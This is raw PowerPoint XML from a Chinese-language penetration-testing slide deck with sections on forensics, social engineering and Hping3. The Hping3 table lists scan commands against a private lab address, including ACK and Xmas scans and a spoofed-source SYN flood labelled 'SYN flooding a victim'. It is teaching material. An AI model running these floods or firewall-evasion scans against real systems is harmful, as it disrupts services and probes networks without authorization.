            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>數位鑑識工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>| Forensics</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="內容版面配置區 4"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1934191" y="1305098"/>
            <a:ext cx="5023562" cy="4781615"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2493192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9917" y="257693"/>
            <a:ext cx="7772400" cy="847067"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>12.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>報表工具 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Reproting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> tools</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2114501" y="2120900"/>
            <a:ext cx="4914997" cy="4051300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3980689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8066" y="257693"/>
            <a:ext cx="8695112" cy="847067"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>13.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 社交工程攻擊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Social engineering tools</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2040728" y="2120900"/>
            <a:ext cx="5062544" cy="4051300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2959668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7794" y="282077"/>
            <a:ext cx="8695112" cy="847067"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>14.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 系統</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>服務</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>|system service</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2182389" y="2120900"/>
            <a:ext cx="4779221" cy="4051300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4286238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a:t>滲透測試主題</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="6000" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="6000" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="6000" b="1" dirty="0"/>
              <a:t>Hping3</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="6000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3972221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80796" y="303948"/>
            <a:ext cx="3943350" cy="610791"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>Hping3 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="投影片編號版面配置區 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D16C3A51-89D0-4E4D-AA61-5A30A561532A}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="79628" y="1112282"/>
            <a:ext cx="8643748" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>的加強版</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>當</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>不到某個目標的時候，不一定是目標沒有開啟，有可能是有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>ACL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>或是防火牆，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Hping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>就可以處理這個問題，因為他不只利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>去執行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>這個動作，所以可能可以繞過防火牆的規則。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>功能強大</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>用於測試和掃描網路設備、執行網路性能測試、進行渗透測試和安全評估，以及進行各種網絡探測操作。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="表格 8"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1357456366"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="79628" y="3369546"/>
          <a:ext cx="8899622" cy="2400300"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="5194936">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="787317696"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3704686">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1549401002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="525780">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>sudo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t> hping3 -1 192.168.43.122</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500" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>利用</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>ICMP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1500" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>去</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>PING</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1500" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>目標，作用跟</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>ping</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1500" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>一樣</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164111"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="297180">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>sudo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t> hping3 -A 192.168.43.122 -p 80</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500" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>利用</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>ACK scan ping port 80</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035211"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="297180">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>sudo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t> hping3 -F -P -U192.168.43.122 -p 80</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TW" sz="1500" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>Xmas Scan</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94614916"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="297180">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>sudo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t> hping3 -9 HTTP -I eth0</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500" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>抓取某網卡的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>HTTP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1500" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>封包</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5309423"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="982980">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>sudo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t> hping3 -S 192.168.43.122 -a 192.168.43.101 -p 22 --flood</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TW" sz="1500" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>SYN flooding a victim</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
